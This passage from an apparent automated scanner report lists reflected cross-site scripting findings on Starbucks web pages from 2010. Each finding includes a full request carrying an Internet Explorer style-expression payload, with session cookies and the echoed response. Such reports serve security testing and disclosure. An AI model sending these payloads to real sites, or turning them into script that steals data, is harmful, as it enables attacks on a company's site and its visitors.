Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:58:58 GMT
Connection: close
Content-Length: 41224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring?da712"style="x:expression(alert(1))"153353c2d05=1"/>
...[SNIP]...

3.14. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/vanilla

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b02"style%3d"x%3aexpression(alert(1))"11530d23784 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e0b02"style="x:expression(alert(1))"11530d23784 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-natural-fusions/vanilla?e0b02"style%3d"x%3aexpression(alert(1))"11530d23784=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:43 GMT
Connection: close
Content-Length: 42403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla?e0b02"style="x:expression(alert(1))"11530d23784=1"/>
...[SNIP]...

3.15. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c78ef"style%3d"x%3aexpression(alert(1))"30e6886810a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c78ef"style="x:expression(alert(1))"30e6886810a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-reserve-coffee?c78ef"style%3d"x%3aexpression(alert(1))"30e6886810a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:03 GMT
Connection: close
Content-Length: 52822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee?c78ef"style="x:expression(alert(1))"30e6886810a=1"/>
...[SNIP]...

3.16. http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c317"style%3d"x%3aexpression(alert(1))"4e1c91bd61f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c317"style="x:expression(alert(1))"4e1c91bd61f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi?1c317"style%3d"x%3aexpression(alert(1))"4e1c91bd61f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:51:31 GMT
Connection: close
Content-Length: 42269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi?1c317"style="x:expression(alert(1))"4e1c91bd61f=1"/>
...[SNIP]...

3.17. http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f782"style%3d"x%3aexpression(alert(1))"945e17cc48d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f782"style="x:expression(alert(1))"945e17cc48d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry?9f782"style%3d"x%3aexpression(alert(1))"945e17cc48d=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:14 GMT
Content-Length: 41929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry?9f782"style="x:expression(alert(1))"945e17cc48d=1"/>
...[SNIP]...

3.18. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6142"style%3d"x%3aexpression(alert(1))"e771ce6760f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6142"style="x:expression(alert(1))"e771ce6760f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?b6142"style%3d"x%3aexpression(alert(1))"e771ce6760f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:14 GMT
Connection: close
Content-Length: 43000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?b6142"style="x:expression(alert(1))"e771ce6760f=1"/>
...[SNIP]...

3.19. http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/nicaragua-corcasan

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2762f"style%3d"x%3aexpression(alert(1))"d1da931e99d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2762f"style="x:expression(alert(1))"d1da931e99d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-reserve-coffee/nicaragua-corcasan?2762f"style%3d"x%3aexpression(alert(1))"d1da931e99d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:45 GMT
Connection: close
Content-Length: 42842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan?2762f"style="x:expression(alert(1))"d1da931e99d=1"/>
...[SNIP]...

3.20. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 818c9"style%3d"x%3aexpression(alert(1))"3aaeb9fa4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 818c9"style="x:expression(alert(1))"3aaeb9fa4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/via?818c9"style%3d"x%3aexpression(alert(1))"3aaeb9fa4a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:49 GMT
Connection: close
Content-Length: 51777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via?818c9"style="x:expression(alert(1))"3aaeb9fa4a=1"/>
...[SNIP]...

3.21. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/flavored-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4285"style%3d"x%3aexpression(alert(1))"cebb7d2a308 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4285"style="x:expression(alert(1))"cebb7d2a308 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via/flavored-coffee?d4285"style%3d"x%3aexpression(alert(1))"cebb7d2a308=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:37 GMT
Content-Length: 53694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via/flavored-coffee?d4285"style="x:expression(alert(1))"cebb7d2a308=1"/>
...[SNIP]...

3.22. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/instant-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7511a"style%3d"x%3aexpression(alert(1))"c08da2b8d6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7511a"style="x:expression(alert(1))"c08da2b8d6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via/instant-coffee?7511a"style%3d"x%3aexpression(alert(1))"c08da2b8d6b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:24 GMT
Connection: close
Content-Length: 53628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via/instant-coffee?7511a"style="x:expression(alert(1))"c08da2b8d6b=1"/>
...[SNIP]...

3.23. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32506"style%3d"x%3aexpression(alert(1))"0b3e0429598 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32506"style="x:expression(alert(1))"0b3e0429598 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee?32506"style%3d"x%3aexpression(alert(1))"0b3e0429598=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:51:46 GMT
Connection: close
Content-Length: 54456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee?32506"style="x:expression(alert(1))"0b3e0429598=1"/>
...[SNIP]...

3.24. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/africa-arabia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 36fd8"style="x:expression(alert(1))"eee799f60ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/africa-arabia?36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:18 GMT
Connection: close
Content-Length: 41207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?36fd8"style="x:expression(alert(1))"eee799f60ab=1"/>
...[SNIP]...

3.25. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/asia-pacific

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d4f5"style%3d"x%3aexpression(alert(1))"07322c9d36a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d4f5"style="x:expression(alert(1))"07322c9d36a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/asia-pacific?5d4f5"style%3d"x%3aexpression(alert(1))"07322c9d36a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:23 GMT
Connection: close
Content-Length: 40730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?5d4f5"style="x:expression(alert(1))"07322c9d36a=1"/>
...[SNIP]...

3.26. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc378"style%3d"x%3aexpression(alert(1))"dc2a561ad6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc378"style="x:expression(alert(1))"dc2a561ad6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast?bc378"style%3d"x%3aexpression(alert(1))"dc2a561ad6f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:32:57 GMT
Connection: close
Content-Length: 42564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?bc378"style="x:expression(alert(1))"dc2a561ad6f=1"/>
...[SNIP]...

3.27. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/latin-america

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ed27"style%3d"x%3aexpression(alert(1))"54fc7b2d713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ed27"style="x:expression(alert(1))"54fc7b2d713 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/latin-america?9ed27"style%3d"x%3aexpression(alert(1))"54fc7b2d713=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
